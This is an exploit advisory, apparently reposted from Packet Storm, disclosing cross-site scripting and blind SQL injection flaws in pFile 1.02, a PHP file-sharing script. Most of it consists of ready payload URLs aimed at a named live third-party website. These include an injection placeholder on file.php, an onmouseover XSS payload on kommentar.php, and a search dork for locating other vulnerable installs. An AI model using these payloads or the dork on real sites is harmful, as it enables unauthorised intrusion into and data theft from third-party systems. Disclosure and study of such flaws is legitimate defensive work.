Pfile version 1.02 suffers from cross site scripting and remote SQL injection vulnerabilities.
5d886584cbf2c8533cd7efae044b8130d3b097ea7474ffaed7f309bc7ac69ec1===============================
pfile_1.02 Mullti Vulnerability
===============================
# Vendor: http://www.powie.de/wp-content/uploads/pfile_1.02.zip
# Date: 2012-1-27
# Author : indoushka
########################################################
# Exploit By indoushka
-------------
dork : pFile 1.02 © Thomas Schmidt, 2003 -- Thomas Ehrhardt, 2002-2011 --
blind SQL :
http://www.edv-ssh.de/pfile/file.php?eintrag=0&filecat=0&id=%24%7binjecthere%7d
(XSS/HTML Injection)
http://www.edv-ssh.de/pfile/kommentar.php?filecat=%22%20onmouseover%3dprompt%28906466%29%20bad%3d%22&fileid=1
SQL injection
http://www.edv-ssh.de/pfile/file.php?eintrag=0&filecat=0&id=%24{injecthere}
----------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed